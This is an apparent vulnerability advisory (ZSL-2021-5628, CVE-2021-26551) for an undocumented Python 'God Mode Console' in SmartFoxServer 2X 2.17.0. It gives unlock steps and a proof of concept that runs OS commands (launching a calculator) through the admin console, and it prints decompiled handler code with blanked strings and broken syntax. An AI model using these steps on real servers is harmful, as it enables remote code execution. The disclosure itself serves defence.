SmartFoxServer 2X 2.17.0 God Mode Console Remote Code Execution  
Vendor: gotoAndPlay()  
Product web page:  
Affected version: Server: 2.17.0  
Remote Admin: 3.2.6  
SmartFoxServer 2X, Pro, Basic  
Summary: SmartFoxServer (SFS) is a comprehensive SDK for  
rapidly developing multiplayer games and applications  
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal  
Windows Platform, Android, Java, C++ and more. SmartFoxServer  
comes with a rich set of features, an impressive  
documentation set, tens of examples with their source,  
powerful administration tools and a very active support  
forum. Born in 2004, and evolving continuously since  
then, today SmartFoxServer is the leading middleware to  
create large scale multiplayer games, MMOs and virtual  
communities. Thanks to its simplicity of use, versatility  
and performance, it currently powers hundreds of projects  
all over the world, from small chats and turn-based games  
to massive virtual worlds and realtime games.  
Desc: An authenticated attacker can execute remote arbitrary  
Python code after enabling and unlocking the undocumented  
console module.  
Tested on: Windows (all) 64bit installer  
Linux/Unix 64bit installer  
MacOS (10.8+) 64bit installer  
Java 1.8.0_281  
Python 3.9.1  
Python 2.7.14  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2021-5628  
Advisory URL:  
CVE ID: CVE-2021-26551  
Undocumented functionality in software  
See also:  
- Backdoor (computing)  
- Easter egg (media)  
God Mode Console (Console Module) unlock instructions:  
$ pwd  
$ vi /admintool.xml # Uncomment <module id="Console" name="Console" description="Interact with the SmartFoxServer instance via command line"/>  
$ cd .. ;pwd  
$ touch ConsoleModuleUnlock.txt  
Mac/Windows PoC:  
GET http://localhost:8080/admin/modules/console.html HTTP/1.1  
ADMIN_CONSOLE, version 3.0.0  
Type help() for assistance.  
> help()  
zm SFSZoneManager  
sfs SmartFoxServer  
um SFSUserManager  
api SFSApi  
bum SFSBannedUserManager  
xm SFSExtensionManager  
eng BitSwarmEngine  
sm DefaultSessionManager  
extras() For more custom function calls  
shortcuts() For keyboard shortcuts details  
> eng  
> extras()  
version(): Shows the Console extension version  
reloadScripts(): Reload the dynamic server scripts  
execute(): Launches the last loaded script again  
files(path): Shows the files at the specified path  
controller(id): Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher  
zones(): List of active zones  
> version()  
> files(".") # Win64  
['config', 'data', 'extensions', 'lib', 'logs', 'sfs2x-service.exe', 'sfs2x-service.vmoptions', 'sfs2x-standalone.exe', 'sfs2x-standalone.vmoptions', 'sfs2x.bat', 'www', 'zones']  
> files(".") # MacOS  
['zones', 'config', 'www', 'extensions', 'logs', 'lib', 'sfs2x-service.vmoptions', 'sfs2x-standalone.vmoptions', 'sfs2x.-standalone', 'data', 'sfs2x-service']  
> import os  
> os.system("C:\\windows\\system32\\calc.exe") # Win64  
> import popen2  
> os.popen2("""osascript -e 'tell app "Calculator" to open'""") # MacOS  
# _____ _____ ____ _____ _____ ____ _____  
# | __| | \ | | | \| __|  
# | | | | | | | | | | | | | | | __|  
# |_____|_____|____/ |_|_|_|_____|____/|_____|  
# _____ _____ _____ _____ _____ __ _____  
# | | | | | __| | | | __|  
# | --| | | | | |__ | | | |__| __|  
# |_____|_____|_|___|_____|_____|_____|_____|  
# SmartFoxServer2X Admin Console Scripts  
# (c) 2012-2016 gotoAndPlay()  
# @author Marco Lapi  
# Version 2.x  
# Python Imports  
import types  
import sys  
# This global variable allows to lock the Console so that it can't be misused  
__CONSOLE_LOCK = False  
# Java Imports  
import java  
from import *  
__scripts = [  
{'name':'version()', 'doc':'Shows the Console extension version'},  
{'name':'reloadScripts()', 'doc':'Reload the dynamic server scripts'},  
{'name':'execute()', 'doc':'Launches the last loaded script again'},  
{'name':'files(path)', 'doc':'Shows the files at the specified path'},  
{'name':'controller(id)', 'doc':'Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher'},  
{'name':'zones()', 'doc':'List of active zones'}  
# override defaults based on osType  
if osType == "nt":  
shellCmd = ["cmd", "/c"]  
envCmd = "set"  
envTransform = string.upper  
elif osType == "dos":  
shellCmd = ["", "/c"]  
envCmd = "set"  
envTransform = string.upper  
elif osType == "posix":  
shellCmd = ["sh", "-c"]  
envCmd = "env"  
elif osType == "mac":  
curdir = ':' # override Posix directories  
pardir = '::'   
elif osType == "None":  
# else:  
# # may want a warning, but only at high verbosity:  
# __warn( "Unknown os type '%s', using default behavior." % osType )  
return _ShellEnv( shellCmd, envCmd, envTransform )  
package com.smartfoxserver.v2.admin.handlers.requests;  
import org.python.core.PyJavaInstance;  
import org.python.core.PyException;  
import com.smartfoxserver.v2.SmartFoxServer;  
import com.smartfoxserver.bitswarm.core.BitSwarmEngine;  
import org.python.core.PyString;  
import org.python.core.Py;  
import org.python.core.PySystemState;  
import com.smartfoxserver.v2.extensions.ExtensionLogLevel;  
import com.smartfoxserver.v2.entities.User;  
import org.python.core.PyObject;  
import org.python.util.PythonInterpreter;  
import com.smartfoxserver.v2.annotations.Instantiation;  
import com.smartfoxserver.v2.annotations.MultiHandler;  
public class ConsoleModuleReqHandler extends BaseAdminModuleReqHandler  
public static final String MODULE_ID = "Console";  
public static final String VER = "2.0.1";  
private static final String MODULE_UNLOCK_FILE = "ConsoleModuleUnlock.txt";  
private static final String COMMANDS_PREFIX = "console";  
private static final String FN_HINTS = "__hints__";  
private static final String CONSOLE_LOCK = "__CONSOLE_LOCK";  
private static final String CMD_RELOAD_SCRIPTS = "reloadScripts()";  
private static final String SCRIPT_PATH = "config/admin/gmc/";  
private static final String MAIN_SCRIPT = "";  
private static final String GRID_SCRIPT = "";  
private final String REQ_CMD = "cmd";  
private final String REQ_HINT = "hint";  
private final String REQ_SCRIPT = "script";  
private final String RES_ERROR_LOCKED = "locked";  
protected PythonInterpreter runTime;  
private PyObject fnGetHints;  
private volatile boolean inited;  
public ConsoleModuleReqHandler() {  
super("console", "Console");  
this.inited = false;  
public void handleAdminRequest(final User sender, final ISFSObject params) {  
if (!this.inited) {  
if (!this.isModuleUnlocked()) {  
this.trace(ExtensionLogLevel.WARN, "Console module is locked. Request denied");  
this.sendResponse("locked", (ISFSObject)new SFSObject(), sender);  
final String cmd = params.getUtfString("__[[REQUEST_ID]]__");  
if (cmd.equals("cmd")) {  
this.handleCommand(params, sender);  
else if (cmd.equals("hint")) {  
this.handleCodeHint(params, sender);  
else if (cmd.equals("script")) {  
this.handleScript(params, sender);  
public synchronized void init() {  
final String script = this.loadMainScript();  
if (script == null) {  
throw new RuntimeException("Cannot load AdminConsole's helper script! Plase reinstall this Extension making sure to follow the documentation step by step.");  
this.runTime = new PythonInterpreter((PyObject)null, new PySystemState());  
final PySystemState sys = Py.getSystemState();  
sys.path.append((PyObject)new PyString("./extensions/"));  
sys.path.append((PyObject)new PyString("./extensions/__lib__/AdminConsole/"));  
this.runTime.set("sfs", (Object)this.sfs);  
this.runTime.set("eng", (Object)BitSwarmEngine.getInstance());  
this.runTime.set("api", (Object)this.sfs.getAPIManager().getSFSApi());  
this.runTime.set("um", (Object)this.sfs.getUserManager());  
this.runTime.set("zm", (Object)this.sfs.getZoneManager());  
this.runTime.set("xm", (Object)this.sfs.getExtensionManager());  
this.runTime.set("bum", (Object)this.sfs.getBannedUserManager());  
this.runTime.set("sm", (Object)this.sfs.getSessionManager());  
this.runTime.set("__parent__", (Object)this);  
this.runTime.exec("_2XGlobals_ = {'sfs':sfs,'eng':eng,'api':api,'um':um,'zm':zm,'xm':xm,'bum':bum,'sm':sm}");  
this.fnGetHints = this.runTime.get("__hints__");  
this.inited = true;  
private String loadMainScript() {  
String script = null;  
try {  
script = FileUtils.readFileToString(new File("config/admin/gmc/"));  
catch (IOException ex) {}  
if (SmartFoxServer.grid()) {  
String gridScript = null;  
try {  
gridScript = FileUtils.readFileToString(new File("config/admin/gmc/"));  
script = String.valueOf(script) + gridScript;  
catch (IOException ex2) {}  
return script;  
private void handleCommand(final ISFSObject params, final User sender) {  
PyException err = null;  
final String cmd = params.getUtfString("c");  
PyObject result = null;  
ISFSObject response = null;  
if (!cmd.equals("reloadScripts()")) {  
try {  
result = this.runTime.eval(cmd);  
catch (PyException err3) {  
try {  
catch (PyException err2) {  
err = err2;  
if (result != null) {  
String repr = null;  
if (result instanceof PyJavaInstance) {  
final Object o = ((PyJavaInstance)result).__tojava__((Class)Object.class);  
repr = o.toString();  
else {  
repr = result.toString();  
repr = this.checkHTML(repr);  
response = (ISFSObject)new SFSObject();  
response.putUtfString("r", repr);  
else if (err != null) {  
response = (ISFSObject)new SFSObject();  
response.putUtfString("e", err.toString());  
this.sendResponse("cmd", response, sender);  
private void handleCodeHint(final ISFSObject params, final User sender) {  
final String cmd = params.getUtfString("c");  
try {  
final PyObject pyObj = this.runTime.eval(cmd);  
final PyObject res = this.fnGetHints.__call__(pyObj, (PyObject)new PyJavaInstance((Object)sender));  
final SFSObject sfso = (SFSObject)res.__tojava__((Class)SFSObject.class);  
this.sendResponse("hint", (ISFSObject)sfso, sender);  
catch (PyException ex) {}  
private void handleScript(final ISFSObject params, final User sender) {  
final byte[] data = params.getByteArray("script");  
final String scriptData = new String(data);  
final ISFSObject response = (ISFSObject)new SFSObject();  
try {  
final PyObject fnExecute = this.runTime.get("execute");  
final PyObject res = fnExecute.__call__();  
response.putUtfString("r", res.toString());  
catch (PyException err) {  
response.putUtfString("e", err.toString());  
this.sendResponse("script", response, sender);  
private String checkHTML(String data) {  
if (data.indexOf(60) > -1 && data.indexOf("<span") == -1) {  
data = data.replaceAll("\\<", "<");  
return data.replaceAll("\\>", ">");  
return data;  
private void checkConsoleLock() {  
final Boolean locked = (Boolean)this.runTime.get("__CONSOLE_LOCK", (Class)Boolean.class);  
if (locked) {  
throw new IllegalStateException("Admin Console is locked.");  
private boolean isModuleUnlocked() {  
final File lock = new File("config/ConsoleModuleUnlock.txt");  
return lock.exists();  